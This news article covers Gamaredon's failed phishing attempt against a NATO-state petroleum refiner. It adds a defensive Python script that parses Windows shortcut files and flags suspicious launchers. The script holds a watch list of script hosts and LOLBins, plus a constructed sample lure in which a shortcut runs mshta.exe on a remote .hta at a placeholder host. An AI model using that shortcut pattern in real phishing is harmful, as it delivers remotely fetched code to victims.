The Russia-linked Gamaredon group has been found to have attempted to break into a large petroleum refining company in a NATO member state earlier this year, amid the ongoing Russo-Ukrainian war.
The attack reportedly took place on Aug. 30 and was unsuccessful. It is one of several intrusions attributed to the advanced persistent threat (APT), which is linked to Russia's Federal Security Service (FSB).
"This group's operations are regularly caught by researchers and government organizations, and yet they don't seem to care. They simply add additional obfuscation, new domains, and new techniques and try again – often even reusing previous samples," the researchers wrote, as reported by Cyber News.
The research, published Tuesday by Palo Alto Networks Unit 42, found that the hacking group was using English-language lures to boost its "intelligence collection and network access against Ukrainian and NATO allies."
Unit 42 reported that the group primarily uses HTML and Word documents as spear phishing lures, and that these lures increasingly use English alongside the group's traditional Ukrainian-language lures aimed at Ukrainian entities.
The filenames used in the failed attack were: MilitaryassistanceofUkraine.htm, Necessary_military_assistance.rar, and List of necessary things for the provision of military humanitarian assistance to Ukraine.lnk. The three extensions suggest a staged lure: an HTML file, an archive, and finally a Windows shortcut (.lnk) whose long, document-like name disguises what it is. A shortcut carries its own command line, so double-clicking it can launch a program or script rather than open a document, which is why .lnk attachments inside archives deserve scrutiny at the mail gateway and on the endpoint.
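As an added example, not code from the article or from Unit 42, the following Python script triages the last stage of such a lure, the Windows shortcut. It parses the shortcut's ShellLinkHeader and StringData sections as laid out in the MS-SHLLINK format, extracts the relative target path and command-line arguments, and flags script hosts, living-off-the-land binaries and embedded URLs. The two sample shortcuts are constructed inline: the article does not describe the contents of the real .lnk, and the paths, the example.invalid URL and the watched-binary list are assumptions for illustration only.

```python
"""Triage Windows shortcut (.lnk) files delivered as phishing lures (added example).

Parses the MS-SHLLINK ShellLinkHeader and StringData sections and flags command
lines that launch script hosts, LOLBins or remote URLs. The samples at the bottom
are constructed for this example, not real lures.
"""
import re
import struct
from dataclasses import dataclass

LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

# LinkFlags bits (MS-SHLLINK section 2.1.1)
HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

# StringData fields appear in this order, each only if its flag is set.
STRING_FIELDS = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Assumed watch list: binaries a document-looking shortcut has no business launching.
WATCHED_BINARIES = {"mshta", "powershell", "pwsh", "cmd", "wscript", "cscript",
                    "rundll32", "regsvr32", "certutil", "bitsadmin", "msiexec"}


@dataclass
class LnkStrings:
    name: str = ""
    relative_path: str = ""
    working_dir: str = ""
    arguments: str = ""
    icon_location: str = ""


def parse_lnk(data: bytes) -> LnkStrings:
    """Return the StringData fields of a shell link; raise ValueError on a bad header."""
    if (len(data) < LNK_HEADER_SIZE
            or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:   # IDListSize (2 bytes) followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:             # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    out = LnkStrings()
    for flag, attr in STRING_FIELDS:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]  # CountCharacters, no terminator
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        setattr(out, attr, raw.decode("utf-16-le" if unicode else "cp1252", errors="replace"))
    return out


def triage_lnk(data: bytes) -> list:
    """Return human-readable findings; an empty list means nothing stood out."""
    s = parse_lnk(data)
    launch = f"{s.relative_path} {s.arguments}".lower()
    findings, seen = [], set()
    for token in re.split(r"[\\/\s\"']+", launch):
        name = token[:-4] if token.endswith(".exe") else token
        if name in WATCHED_BINARIES and name not in seen:
            seen.add(name)
            findings.append(f"launches script host or LOLBin: {name}")
    if re.search(r"https?://", s.arguments, re.IGNORECASE):
        findings.append("command line references a URL")
    if len(s.arguments) > 200:
        findings.append(f"unusually long command line ({len(s.arguments)} chars)")
    return findings


def build_lnk(relative_path: str = "", arguments: str = "", icon_location: str = "") -> bytes:
    """Assemble a minimal Unicode shell link (header + StringData + TerminalBlock) for testing."""
    flags, body = IS_UNICODE, b""
    for flag, value in ((HAS_RELATIVE_PATH, relative_path), (HAS_ARGUMENTS, arguments),
                        (HAS_ICON_LOCATION, icon_location)):
        if value:
            flags |= flag
            body += struct.pack("<H", len(value)) + value.encode("utf-16-le")
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + struct.pack("<I", 0x20)           # FileAttributes: FILE_ATTRIBUTE_ARCHIVE
              + b"\x00" * 24                      # Creation/Access/Write FILETIMEs
              + struct.pack("<IIIH", 0, 0, 1, 0)  # FileSize, IconIndex, SW_SHOWNORMAL, HotKey
              + b"\x00" * 10)                     # Reserved1/2/3
    if len(header) != LNK_HEADER_SIZE:
        raise AssertionError("header layout error")
    return header + body + struct.pack("<I", 0)   # TerminalBlock closes ExtraData


# Constructed samples (hypothetical paths and URL; not the shortcut from the reported campaign).
SAMPLE_LURE = build_lnk(
    relative_path=r"..\..\..\Windows\System32\mshta.exe",
    arguments="https://example.invalid/assistance.hta",
    icon_location=r"%SystemRoot%\System32\shell32.dll",
)
SAMPLE_BENIGN = build_lnk(relative_path=r"..\Documents\assistance_list.docx")

if __name__ == "__main__":
    for label, blob in (("lure", SAMPLE_LURE), ("benign", SAMPLE_BENIGN)):
        print(label, parse_lnk(blob).arguments or "<no args>", triage_lnk(blob))
```

The parser deliberately skips the LinkTargetIDList and LinkInfo blocks by their declared sizes, so a shortcut whose target lives only in LinkInfo (LocalBasePath) will show an empty relative path; for production triage, extend it to parse LocalBasePath or hand the file to a full-featured tool, and treat the watched-binary list as a starting point rather than a complete one.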
The report did not include the name of the petroleum company or the country where the facility is located.
Gamaredon, also known by the monikers Actinium, Armageddon, Iron Tilden, Primitive Bear, Shuckworm, Trident Ursa, and Winterflounder, has a history of targeting Ukrainian entities and, to a lesser extent, NATO allies to harvest sensitive data.
Cyber espionage against non-Ukrainian targets has been on the rise in recent weeks, with multiple examples spilling into the public eye. For example, another set of suspected Russian hackers tried to break into six military, technology, or logistics firms in the US and Europe that do work with Ukraine, French cybersecurity firm Sekoia.io reported.
According to Unit 42, the group tries to evade detection by frequently rotating the IP addresses behind its infrastructure; in one instance it made its activity appear to originate from an IP address owned by the Pentagon. Constant rotation of this kind is why defenders tracking the group get more mileage from its domains and its habit of reusing samples than from IP blocklists alone.